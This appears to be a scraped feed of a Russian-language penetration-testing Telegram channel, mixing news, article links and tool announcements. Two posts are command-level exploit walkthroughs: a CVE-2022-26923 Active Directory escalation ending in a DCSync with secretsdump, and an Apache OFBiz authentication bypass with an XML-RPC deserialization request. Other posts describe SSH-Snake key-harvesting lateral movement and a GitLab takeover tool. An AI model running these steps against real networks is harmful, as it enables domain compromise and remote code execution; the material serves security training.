Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:[email protected]' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u [email protected] -p password -ca 'CA NAME' -template User -upn [email protected] -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@[email protected]' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@[email protected]' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13
Forwarded from Offensive Xwitter
😈 [ Vozec @Vozec1 ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
Инфраструктурный пентест по шагам: инструменты, методологии и разведка
В этой статье вас ждет база — те вещи, которые должен знать каждый начинающий пентестер, занимающийся аудитами внутренней инфраструктуры.
Начнем с теории — того, по каким схемам действуют хакеры и как знание этих шаблонов помогает в работе пентестера. Затем перейдем к выбору операционных систем и полезным фреймворкам. Рассмотрим гаджеты, которые чаще всего применяются на практике во время атак на организации. Закончим разбором и анализом UDP и TCP-портов, через которые можно захватить первую учетную запись в чужой инфраструктуре.
➡️ https://clck.ru/37iCvs
🌚 @poxek
В этой статье вас ждет база — те вещи, которые должен знать каждый начинающий пентестер, занимающийся аудитами внутренней инфраструктуры.
Начнем с теории — того, по каким схемам действуют хакеры и как знание этих шаблонов помогает в работе пентестера. Затем перейдем к выбору операционных систем и полезным фреймворкам. Рассмотрим гаджеты, которые чаще всего применяются на практике во время атак на организации. Закончим разбором и анализом UDP и TCP-портов, через которые можно захватить первую учетную запись в чужой инфраструктуре.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
Forwarded from oh, no - exception!
Анализируем систему с Phishy
Смотрим на фишинговую атаку: как злоумышленник обвел вокруг пальца пользователя, даже не постаравшись, что хранят Firefox и WhatsApp и не стыдятся, как наглеют макросы и почему нам очень повезло - здесь:
Phishy - смотрим на атаку
Смотрим на фишинговую атаку: как злоумышленник обвел вокруг пальца пользователя, даже не постаравшись, что хранят Firefox и WhatsApp и не стыдятся, как наглеют макросы и почему нам очень повезло - здесь:
Phishy - смотрим на атаку
Telegraph
Phishy - смотрим на атаку
Сценарий Сотрудник компании повелся на фейковую раздачу iPhone. Наша команда взяла образ диска системы сотрудника для дальнейшего анализа. Вам как SOC-аналитику поручено определить, каким образом система была скомпрометирована. Смотрим на атаку Для анализа…
🔥10
#подкаст
В этом подкасте мы поговорили о задачах пентестера. Затронули тему OSINT и разберемся, как спасти слитые данные. Плюсы ведения личного блога, про силу личного бренда и как он помогает в работе.
На момент подкаста канал ещё назывался Дневник Безопасника
Также вы можете послушать подкаст на других платформах:
Хотите вторую часть?)
Пишите в комментариях ваши отзывы о подкасте и дальнейшие пожелания!
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Сергей Зыбнев. Будни Middle Пентестера. Разбираемся с OSINT. Личный бренд и менторство.
Сергей Зыбнев - 19-летний Middle пентестер.
В этом выпуске мы поговорим о задачах пентестера уровня middle. Затронем тему OSINT и разберемся, как спасти слитые данные. Плюсы ведения личного блога, про силу личного бренда и как он помогает в работе.
Выпуск…
В этом выпуске мы поговорим о задачах пентестера уровня middle. Затронем тему OSINT и разберемся, как спасти слитые данные. Плюсы ведения личного блога, про силу личного бренда и как он помогает в работе.
Выпуск…
Forwarded from Purple Chronicles (ELK Enjoyer)
"Как обойти UAC?"
Такой вопрос может возникнуть в тот момент, когда у нас есть шелл на атакуемой машине, скомпрометированный пользователь входит в административную группу, но попытка выполнить любое привилегированное действие приводит к ошибке "Отказано в доступе"
В этой статье мы поговорим про UAC чуть подробнее и рассмотрим классический способ его обхода при помощи fodhelper.exe как с отключенным, так и с работающим Windows Defender
Также познакомимся с одним из способов мониторинга и обнаружения вредоносной активности на примере MP SIEM
https://telegra.ph/UAC-bypass-01-12
Если вы ничего не слышали про UAC и не понимаете, о чем идёт речь, то не переживайте: необходимый теоретический материал приведён в начале статьи.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
UAC bypass with fodhelper.exe vs Windows Defender
Всем привет! Сегодня мы разберёмся с методикой обхода UAC при помощи утилиты fodhelper.exe, рассмотрим несколько способов при отключенном Windows Defender, а также усложним задачу и обманем защитник Windows, приправив всё капелькой теории.
Forwarded from PWN AI
И вот, лабы стали доступны. Я уже прошёл 3/4 и хочу поделиться с вами райтапом. Сейчас вы можете посмотреть 1ую часть и 2ух лаб, связанных с эксплуатацией уязвимостей через LLM API:
https://teletype.in/@wearetyomsmnv/lmQKDcRMH9c
Как только я решу 4ую лабу, так сразу я опубликую следующую часть!
https://teletype.in/@wearetyomsmnv/lmQKDcRMH9c
Как только я решу 4ую лабу, так сразу я опубликую следующую часть!
Teletype
PortSwigger labs, Web LLM attacks, writeup, p1
Начнём с самой простой лабы
This media is not supported in your browser
VIEW IN TELEGRAM
#web #pentest
Приветствую! Это статья о клиентских уязвимостях, которые мне показались интересными.
Целью статьи является показать, что иногда из, казалось бы, скучных уязвимостей с низким импактом, можно выжимать больше, чем кажется.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
#форензика #SOC #утилиты
Forensictools - это набор инструментов, предназначенный для цифровой криминалистики и предлагающий широкий спектр возможностей для сотрудника расследования инцидентов🔍
Его основная цель - упростить создание виртуальной среды для проведения криминалистических экспертиз.
➡️ Это своего рода чемоданчик, собранный в готовый exe, в котором лежат базовые инструменты криминалиста: от hex editor до работы с хэшем, анализ бинарных файлов ( знаменитый detect it easy) и обработка артефактов windows, а также многое и многое другое.
Скачать данный набор и изучить весь его спектр можно по ссылочке на GitHub.
📶 Поделиться мнением о данном инструменте или обсудить волнующий вопрос с единомышленниками можно в чате канала AP Security.
Forensictools - это набор инструментов, предназначенный для цифровой криминалистики и предлагающий широкий спектр возможностей для сотрудника расследования инцидентов
Его основная цель - упростить создание виртуальной среды для проведения криминалистических экспертиз.
Скачать данный набор и изучить весь его спектр можно по ссылочке на GitHub.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14
Forwarded from Monkey Hacker
Oh yes, ping pong
Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать😺
Суть заключается в том, что
Тут все начинается с
Дальше идем в
Т.е по факту, мы тупо можем обойти проверку, путем вставки любого символа ему, и плюс
Поэтому мы можем дергать ручки
А через серелиализацию, мы передаем наш шелл, который можно сделать через ysoserial
Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать
XML-RPC. Решил глянуть, что это было и как оно происходит Суть заключается в том, что
XML-RPC, по логике можно использовать только с валидными кредами, но глянем на сам момент аутентификации юзера в LoginWorker.javaList<String> unpwErrMsgList = new LinkedList<String>();
if (UtilValidate.isEmpty(username)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.username_was_empty_reenter", UtilHttp.getLocale(request)));
}
if (UtilValidate.isEmpty(password) && UtilValidate.isEmpty(token)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.password_was_empty_reenter", UtilHttp.getLocale(request)));
}
boolean requirePasswordChange = "Y".equals(request.getParameter("requirePasswordChange"));
if (!unpwErrMsgList.isEmpty()) {
request.setAttribute("_ERROR_MESSAGE_LIST_", unpwErrMsgList);
return requirePasswordChange ? "requirePasswordChange" : "error";
}
Тут все начинается с
requirePasswordChange, который не обращает внимание на то, введет ли юзер валидные креды. Если юзер в качестве параметра отдает Y, то метод login(HttpServletRequest request, HttpServletResponse response) вернет строку requirePasswordChangeДальше идем в
checkLogin() и там уже идет следующий моментif (username == null
|| (password == null && token == null)
|| "error".equals(login(request, response)))
Т.е по факту, мы тупо можем обойти проверку, путем вставки любого символа ему, и плюс
"error".equals(login(request, response)) не будет срабатывать, т.к мы заставили login(...) вернуть requirePasswordChangeПоэтому мы можем дергать ручки
XML-RPC/webtools/control/ping?USERNAME=&PASSWORD=s&requirePasswordChange=Y
А через серелиализацию, мы передаем наш шелл, который можно сделать через ysoserial
POST /webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 4002
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>Methodname</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="https://ws.apache.org/xmlrpc/namespaces/extensions">serialized_shell</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Багхантинг — очень интересное занятие (по моему скромному мнению 🙂). Никогда не знаешь, какую уязвимость удастся найти сегодня. Каждый белый хакер уникален и имеет собственный стиль, так же как художники, учителя и специалисты любого другого профиля.
Тяжелым трудом приобретаются необходимые навыки и оттачиваются техники поиска уязвимостей определенных классов. В случае успеха приложенные усилия окупаются наградой: можно получить крупное денежное вознаграждение.
Please open Telegram to view this post
VIEW IN TELEGRAM
Все мы знаем про чат Кавычки, чат RedTeam Brazzers и подобные. Но что если попробовать собрать багхантеров, веберов, инфраструктурщиков, мобильщиков, blue team, red team и даже purple team? А также админов других крупных телеграм каналов!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥7👏4
Forwarded from Cybred
https://github.com/MegaManSec/SSH-Snake
SSH-Snake — это bash-скрипт для автоматического обхода сети с использованием ssh-ключей, обнаруженных на скомпрометированных системах, и создания полной карты всех взломанных хостов.
Принцип работы:
1. Найти на текущей машине все приватные ssh-ключи
2. Просканировать сеть и найти живые хосты, к которым можно подключиться
3. Попытаться подключиться к хостам с ключами, найденными в первом пункте
4. После подключения к новому устройству, повторить все шаги, начиная с первого.
Возможности:
— переходит от одной системы к другой только с помощью bash и stdin, не создавая никаких файлов
— как только попал на новую систему, автоматически пытается повыситься до рута, используя sudo
— ищет закрытые ключи в часто используемых файлах и папках, обход гибко настраивается
— запоминает, какие машины уже были просканированы, чтобы не подключаться к ним снова
— генерирует на выходе готовый граф (вдохновлен bloodhound) и сохраняет все приватные ключи
SSH-Snake — это bash-скрипт для автоматического обхода сети с использованием ssh-ключей, обнаруженных на скомпрометированных системах, и создания полной карты всех взломанных хостов.
Принцип работы:
1. Найти на текущей машине все приватные ssh-ключи
2. Просканировать сеть и найти живые хосты, к которым можно подключиться
3. Попытаться подключиться к хостам с ключами, найденными в первом пункте
4. После подключения к новому устройству, повторить все шаги, начиная с первого.
Возможности:
— переходит от одной системы к другой только с помощью bash и stdin, не создавая никаких файлов
— как только попал на новую систему, автоматически пытается повыситься до рута, используя sudo
— ищет закрытые ключи в часто используемых файлах и папках, обход гибко настраивается
— запоминает, какие машины уже были просканированы, чтобы не подключаться к ним снова
— генерирует на выходе готовый граф (вдохновлен bloodhound) и сохраняет все приватные ключи
GitHub
GitHub - MegaManSec/SSH-Snake: SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation…
SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of SSH private key and host discovery. - MegaManSec/SSH-Snake
🔥8
Раз сегодня такой день активности на канале, то можно и суету навести
🥰8🌚4❤1
user space) и пространством ядра (kernel space) операционной системы. Пространство пользователя — это область памяти, где выполняются пользовательские программы, не имеющие прямого доступа к ресурсам аппаратного обеспечения или критическим функциям управления системой.
Пространство ядра — это контролируемая область, которая управляет аппаратным обеспечением компьютера и системными ресурсами.
Для чего нужны syscalls:
Они нужны для выполнения различных задач, связанных с управлением операционной системой и аппаратным обеспечением, таких как:
1. Управление файлами — создание, чтение, запись и удаление файлов.
2. Управление процессами — создание новых процессов, завершение процессов, управление приоритетом и другие задачи по взаимодействию с процессами.
3. Управление памятью — выделение и освобождение памяти, управление защитой памяти.
4. Коммуникация между процессами (IPC) — механизмы для обмена данными между процессами.
5. Ввод-вывод — доступ к устройствам ввода-вывода, таким как диски, сетевые карты, принтеры и т.д.
6. Сетевое взаимодействие — операции, связанные с сетевыми соединениями и передачей данных.
Как работают syscalls:
Когда пользовательская программа требует выполнить операцию, которая не может быть выполнена в пространстве пользователя из-за ограничений безопасности, она делает системный вызов. Программа выполняет специфическую инструкцию процессора, которая инициирует переключение контекста с пространства пользователя на пространство ядра. С этого момента ядро операционной системы начинает работу от имени программы.
Пример системного вызова на псевдокоде:
int status;
status = syscall(SYS_write, fileDescriptor, buffer, count);
В этом примере программа вызывает системный вызов
write через обобщенную функцию syscall, где SYS_write — это идентификатор системного вызова write, fileDescriptor указывает на открытый файл, в который программа хочет записать данные, buffer — это адрес начала данных для записи, а count — это количество байтов для записи.Применение syscalls:
Системные вызовы применяются во всех операционных системах, включая Unix-подобные системы (Linux, macOS) и Windows, для обеспечения безопасного и упорядоченного доступа к ресурсам компьютера. Они являются фундаментальной частью интерфейса программирования приложений (API) операционной системы.
Использование системных вызовов позволяет разработчикам приложений не заботиться о низкоуровневой реализации управления ресурсами и сосредоточиться на создании самого приложения. Кроме того, ядро операционной системы может управлять доступом к ресурсам и обеспечивать безопасность системы, изолируя пользовательские программы от прямого доступа к устройствам и системным функциям.
Please open Telegram to view this post
VIEW IN TELEGRAM
Думаете я сошёл с ума? Могу вам справку показать :D
Но к примеру он не умеет в appsec, а конкретнее в анализ кода полноценный, как тот же Snyk. А даже если бы умел, то нужны и постоянно обновляемые базы данных уязвимостей, как CVE, так и на основе кодовой базы.
Его можно дополнить интересным инструментов Tracee, от тех же разрабов. Интересная штука, но уже работающая на основе eBPF.
Ещё можно вспомнить про всякие SAST, DAST, IAST, MAST, SCA и поиск секретов в коде. С чем-то мы уже справляемся хорошо, к примеру поиск секретов и SAST. MAST на рынке пока мало, но есть один вполне хороший. Юра это про тебя
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9⚡3👏2👾1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9❤🔥1